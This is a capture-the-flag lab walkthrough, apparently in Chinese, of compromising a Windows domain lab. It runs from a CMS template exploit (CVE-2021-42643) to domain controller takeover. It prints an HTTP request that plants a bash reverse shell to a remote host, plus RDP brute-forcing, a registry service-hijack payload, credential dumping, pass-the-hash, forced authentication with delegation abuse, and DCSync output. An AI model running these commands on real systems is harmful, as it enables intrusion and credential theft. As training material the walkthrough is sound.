• CVE-2021-42643
  • diff提权
  • rdp爆破
  • 注册表提权
  • NTLM强制认证+非约束性委派

flag01

拿到ip后,访问/admin
存在弱口令 admin/123456
登陆后查看版本,该版本存在cve-2021-42643

抓包利用,写一个弹shell的poyload,储存在php文件中;.._d_表示上级目录,这样可以把php文件上传到根目录。

1
2
3
4
5
6
7
8
9
10
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1  
Host: 192.168.31.96  
Content-Length: 57  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0  
Content-Type: application/x-www-form-urlencoded;  
Cookie: login_username=admin; login_password=357fce333f91905f3e7342d10e5a5ce4;  
Connection: close  
  
sid=#data_d_.._d_.._d_.._d_a.php&slen=693&scontent=<%3fphp+exec("/bin/bash+-c+'bash+-i+>%26+/dev/tcp/vpsip/9999+0>%261'")%3b%3f>

发包

访问该文件触发命令(访问前先在服务器监听9999端口)

得到shell

由于不是高权限需要提权,查看suid看看有没有可以利用的

1
2
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

发现一个diff,可以用来提权

查看flag01

1
diff --line-format=%L /dev/null /home/flag/flag01.txt

得到flag01和提示
提示WIN19\Adrian和rockyou ,应该是用来rdp爆破的

flag02

上传fscan和chisel

查看机器内网ip

扫描内网

1
fscan -h 172.22.4.0/24

得到内网信息

1
2
3
4
172.22.4.7 DC01
172.22.4.19 FILESEVER
172.22.4.36 
172.22.4.45 WIN19

内网穿透

服务端监听

shell执行命令

搞完代理,扫描shell的ip发现该机器的3389端口开着

使用九头蛇或者crackmapexec爆破

1
proxychains4 hydra -l win19\Adrian -P /usr/share/wordlists/rockyou.txt 172.22.4.45 rdp
1
2
proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

得到账号密码,但是显示密码已过期
win19\Adrian babygirl1

使用smbpasswd远程更改密码,或者直接登录用户后直接修改密码

1
smbpasswd -r 10.0.0.15 -U 'expired'

远程桌面登录

1
proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp

登陆后发现有一个PrivescCheck 文件夹,PrivescCheck 是一个Windows 的提权工具,且是跑完了的,看它生成的 html 文件,发现有一个WSUS和注册表的危险配置

发现用户可以修改名称为gupdate的注册表

注册表提权

先用msf生成一个exe木马
该木马打开SYSTEM的cmd串口,并执行bat的命令,并把它转为exe文件

1
msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\users\Adrian\Desktop\nihao.bat ' --platform windows -f exe-service > nihao.exe

nihao.bat的配置如下:

1
2
3
reg save hklm\system C:\Users\Adrian\Desktop\system
reg save hklm\sam C:\Users\Adrian\Desktop\sam
reg save hklm\security C:\Users\Adrian\Desktop\security

修改注册表命令
通过修改gupdate的注册表项ImagePath 把他改为我们生成的木马

1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\nihao.exe" /f

启动 gupdate 服务触发 msf 的exe命令

1
sc start gupdate

触发成功后,会在桌面生成三个文件

使用secretsdump解密

1
python secretsdump.py LOCAL -system system -sam sam -security security

得到管理员和机器的hash

ptt登陆管理员

1
proxychains4  python3 psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

拿到45机器的权限,查看flag

flag03 + flag04

为方便后续操作添加一个本地管理员账户

1
2
net user nihao nihao9! /add 
net localgroup administrators nihao9 /add

远程桌面连接上

使用探测bloodhound探测域环境,发现WIN19和DC都有非约束委派
非约束委派:允许服务账户以用户的身份访问服务

先下载文件,然后拉入bloodhound即可查看,机器的hash是上面三个文件中解密出来的

1
proxychains bloodhound-python -u win19$ --hashes "aad3b435b51404eeaad3b435b51404ee:bbd1d50b4689e93dc3b61babef482838" -d xiaorang.lab -dc dc01.xiaorang.lab -c all --dns-tcp -ns 172.22.4.7 --auth-method ntlm --zip

非约束委派+NTLM强制认证打DC

使用Rubeus监听TGT

1
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

如果显示没有net3.5,使用下面命令安装
安装net 3.5
sxs下载

1
dism.exe /online /enable-feature /featurename:NetFX3 /Source:D:\sxs

强制认证
使用dfscoerce对域控强制认证

1
proxychains python3 dfscoerce.py -u "win19$" -hashes :bbd1d50b4689e93dc3b61babef482838 -d xiaorang.lab win19 172.22.4.7

或者PetitPotam

1
proxychains python3 PetitPotam.py -u 'WIN19$' -hashes :2c05ad434d747b203a57565194891b38 -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab

认证后,Rubeus就可以监听到域控的TGT票据

1
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6Iki/0YqtJ7VWLHKsnlTAIaKBlKfxBHVuP+4PqtRoAUCDiLg6N9t3Rwd7h/FewEmuAxQV9Dx21LcSkyLnQc2d9WkO/91l93ImQt09Yq9qtWChPbLTWRfSeknqeW0o+M2GaMdOjv2TNFt/OwbvjcwEUddynvqY7cWQ/IQYnQSlGCQDSfIeFMu2Q6aSX1QIheHaK8Tcg6Qs4ythd4i2gtMSDkbeHvJYa/5rPn10P34b/DD/BFJaL3lgLHBA9Jfs4dG0Bi52x66nw8AjeNoFtlwtY7aX0fzC5H5kCTEp+nzXceBXPxd8o8One4txOhE8noytvKslbYXf+npX5p8RMHhH+rFXEg4CDJ+gfm47SpsoppD3p9fbElVU+A5Hbi/62gtxwpDSUdDodo4b3YLdDE16bcrcPjVXxY/caxSoQEml8msFjJ7rVK/0AOkfhkmL1piaMt6S9HvEHAkcw8D0Y5l/j0yqPQ7OwLgKuEqnPYGfiXU9efBHkEybMgZzzaAqSqKmB7jmwvnnLorxcxys3OPNmel19bASrCFTEcixwwpdg/qVkf87FrlWorbMBdTSMkLfGKn95mJnozVz03TccXzvzRyDPTF2UxWc9vW8IpsHM3EqisF/wjcgLC8ShCwRfFy9mRLKkb9p7UALN4NumrVBQFNRFO3l2MYaTShtP/VlHP2rHG+K2WcTx/n9ErcvGAH9ZppjcyfKmPHdhStHlPXiDaH1KD4mNhKz+duGs5yNIaskplKbM7RW3T1M7gzHbvc9GuQjPvyyffYkE3nBAZ4mSozupD1JtFcDBGmPnhcBSI7eu7Hc9Kr2YXdosH5MPtmcUi78VpdLbZTSIeqzVpSeNmpqHxnSqTX44xkh+CPMjrGppDQzx2BXFpgL18W69sS0fMYLu49npyZCuwjEl4IY2RXwhmlZ99RBPru/K1TLSlQnJ31KHdZjICrEmO68qaVv6t5NJi3YwK8jeC4xFhzU10YpJFDcRUnmGXF4ZE0PeUnt3PVSA/AdWZ6+du1DZlYpZ35DwFJnEHEaDwJpiRSSLWPHsoMlo/vodYQyClnJpPjFBbbDcJPsggQaUf+J4hjdxbRY++WT8gdoRuNE/2qpz15Y/4vcbsVOvhXJxtpaim1riXCskG7+VP54e4j/92dMWznaanHlAWlEqs9qPO9CMXbRv0INLlH8G923TftHCx5OMx2xVTMwgloFC8QJnNhY/ZfrRc/Ni4A1H51W8qY6ntSNDS23d3N9zdgKy0q2W7iTrGqTcXpQ0GBdmW/fw+XhWB44AdPTB0gULHkxljL5d3P8IpYZkEYi23eyRLHb06k+KevYfIwJ66hhrjzw2ve6tpKlOzd531Wy5Jarp2+t9CoHeD/6sSHmT5YFsnObLVcq3Bncv7tmtKX/EeCkZfUQ+DPGgUCET/+75mNzIDK0BnlNzzAjA88KsqSHBOvmjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCBJlggmcQ5lpHgQGNePX874w4YU1y+caNbV64KnuuMpSaEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIxODA5MjkwMlqmERgPMjAyNTAyMTgxOTI5MDJapxEYDzIwMjUwMjI1MDkyOTAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

使用命令将TGT转为票据

1
echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6Iki/0YqtJ7VWLHKsnlTAIaKBlKfxBHVuP+4PqtRoAUCDiLg6N9t3Rwd7h/FewEmuAxQV9Dx21LcSkyLnQc2d9WkO/91l93ImQt09Yq9qtWChPbLTWRfSeknqeW0o+M2GaMdOjv2TNFt/OwbvjcwEUddynvqY7cWQ/IQYnQSlGCQDSfIeFMu2Q6aSX1QIheHaK8Tcg6Qs4ythd4i2gtMSDkbeHvJYa/5rPn10P34b/DD/BFJaL3lgLHBA9Jfs4dG0Bi52x66nw8AjeNoFtlwtY7aX0fzC5H5kCTEp+nzXceBXPxd8o8One4txOhE8noytvKslbYXf+npX5p8RMHhH+rFXEg4CDJ+gfm47SpsoppD3p9fbElVU+A5Hbi/62gtxwpDSUdDodo4b3YLdDE16bcrcPjVXxY/caxSoQEml8msFjJ7rVK/0AOkfhkmL1piaMt6S9HvEHAkcw8D0Y5l/j0yqPQ7OwLgKuEqnPYGfiXU9efBHkEybMgZzzaAqSqKmB7jmwvnnLorxcxys3OPNmel19bASrCFTEcixwwpdg/qVkf87FrlWorbMBdTSMkLfGKn95mJnozVz03TccXzvzRyDPTF2UxWc9vW8IpsHM3EqisF/wjcgLC8ShCwRfFy9mRLKkb9p7UALN4NumrVBQFNRFO3l2MYaTShtP/VlHP2rHG+K2WcTx/n9ErcvGAH9ZppjcyfKmPHdhStHlPXiDaH1KD4mNhKz+duGs5yNIaskplKbM7RW3T1M7gzHbvc9GuQjPvyyffYkE3nBAZ4mSozupD1JtFcDBGmPnhcBSI7eu7Hc9Kr2YXdosH5MPtmcUi78VpdLbZTSIeqzVpSeNmpqHxnSqTX44xkh+CPMjrGppDQzx2BXFpgL18W69sS0fMYLu49npyZCuwjEl4IY2RXwhmlZ99RBPru/K1TLSlQnJ31KHdZjICrEmO68qaVv6t5NJi3YwK8jeC4xFhzU10YpJFDcRUnmGXF4ZE0PeUnt3PVSA/AdWZ6+du1DZlYpZ35DwFJnEHEaDwJpiRSSLWPHsoMlo/vodYQyClnJpPjFBbbDcJPsggQaUf+J4hjdxbRY++WT8gdoRuNE/2qpz15Y/4vcbsVOvhXJxtpaim1riXCskG7+VP54e4j/92dMWznaanHlAWlEqs9qPO9CMXbRv0INLlH8G923TftHCx5OMx2xVTMwgloFC8QJnNhY/ZfrRc/Ni4A1H51W8qY6ntSNDS23d3N9zdgKy0q2W7iTrGqTcXpQ0GBdmW/fw+XhWB44AdPTB0gULHkxljL5d3P8IpYZkEYi23eyRLHb06k+KevYfIwJ66hhrjzw2ve6tpKlOzd531Wy5Jarp2+t9CoHeD/6sSHmT5YFsnObLVcq3Bncv7tmtKX/EeCkZfUQ+DPGgUCET/+75mNzIDK0BnlNzzAjA88KsqSHBOvmjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCBJlggmcQ5lpHgQGNePX874w4YU1y+caNbV64KnuuMpSaEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIxODA5MjkwMlqmERgPMjAyNTAyMTgxOTI5MDJapxEYDzIwMjUwMjI1MDkyOTAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi

使用票据导出域管hash

1
mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::ptt DC01.kirbi

* File: 'DC01.kirbi': OK

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /user:administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1601/1/1 8:00:00
Password last change : 2025/2/18 17:28:57
Object Security ID   : S-1-5-21-1913786442-1328635469-1954894845-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 4889f6553239ace1f7c47fa2c619c252
    ntlm- 0: 4889f6553239ace1f7c47fa2c619c252
    ntlm- 1: 4889f6553239ace1f7c47fa2c619c252
    ntlm- 2: 4889f6553239ace1f7c47fa2c619c252
    ntlm- 3: 4889f6553239ace1f7c47fa2c619c252
    lm  - 0: e2f976b4b93c8de94f7c7d26998bde3f
    lm  - 1: c79c7d92b2a21d11c240a59c9d1694b6
    lm  - 2: 87912010df4ce71b5a2bec799103a236

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 144f0dde1f001effdc2ae3dbfa27d316

* Primary:Kerberos-Newer-Keys *
    Default Salt : XIAORANG.LABAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 23b87fd9c4a80c58fb0d71e2a0d5fc82b7de27156d039ad791093aa88ca95eb3
      aes128_hmac       (4096) : 3a4807b53f305c84603ff072655a5c42
      des_cbc_md5       (4096) : 64feb058753bf1a2
    OldCredentials
      aes256_hmac       (4096) : 23b87fd9c4a80c58fb0d71e2a0d5fc82b7de27156d039ad791093aa88ca95eb3
      aes128_hmac       (4096) : 3a4807b53f305c84603ff072655a5c42
      des_cbc_md5       (4096) : 64feb058753bf1a2
    OlderCredentials
      aes256_hmac       (4096) : 23b87fd9c4a80c58fb0d71e2a0d5fc82b7de27156d039ad791093aa88ca95eb3
      aes128_hmac       (4096) : 3a4807b53f305c84603ff072655a5c42
      des_cbc_md5       (4096) : 64feb058753bf1a2

* Primary:Kerberos *
    Default Salt : XIAORANG.LABAdministrator
    Credentials
      des_cbc_md5       : 64feb058753bf1a2
    OldCredentials
      des_cbc_md5       : 64feb058753bf1a2

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  1fd4772b6f3fea5f0a5a234dde150efb
    02  70b5ab2d5931d45749e4f10b80a70466
    03  0d71e6115a7e5850b3e4c777aba623df
    04  1fd4772b6f3fea5f0a5a234dde150efb
    05  354a5ce3ca3629c6ca77a73b462c0a7f
    06  a692fc773761b7edf3a3cad332053a85
    07  3b3bf4f20b86e7f890d2a6f748684c86
    08  511be1f8053c22c147fe774e84f6cfa0
    09  5cd37846466bba0ab01d0a4fb8fd421a
    10  5c90774e68ba65b15563d817ea03be1d
    11  1aa618d4990ce0b031f56c35b00ef135
    12  511be1f8053c22c147fe774e84f6cfa0
    13  385ea61fafea315b384cff461b9e114c
    14  ee5a115e84919b46e718c6c4294dba78
    15  729b4c3a8edab7f12e037ec161293f44
    16  e3ff26cc0629c51fc68f18ce47173f45
    17  bd6d0bafad3f99c28a9a18d9e5351763
    18  359507105fa376c918a80f7fb982446a
    19  20ad44fe17377c5f3815358c33ca7c34
    20  330fb8b3848b024ba40a8cef987d6795
    21  ec544c990f343fe338a4667f3791e5ab
    22  d528c47b4f30acdeb5bf49f49fed7d64
    23  41bb0903f6c2129f27bfa06e6d9b186b
    24  b5c4fc8c656c14829c0da25e0852582a
    25  8bba781aff9bb5e7939f73c216d0e750
    26  d3bb8972f7c7ffbc5b22392125c4e21f
    27  dd97e0d53b5d1ae346029810cf74d0b8
    28  0c084ded5672573ee7c4127ab474f930
    29  c922d791de366eedeb97c1bd0798d6ff


mimikatz(commandline) # exit
Bye!

横向移动

用域管hash登录另一个域用户拿flag03

1
proxychains4 python3 wmiexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19 -codec gbk

查看flag

登陆域控拿到flag04

1
proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7
1
proxychains4 python3 wmiexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7 -codec gbk

参考链接

https://fushuling.com/index.php/2023/09/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7delegation/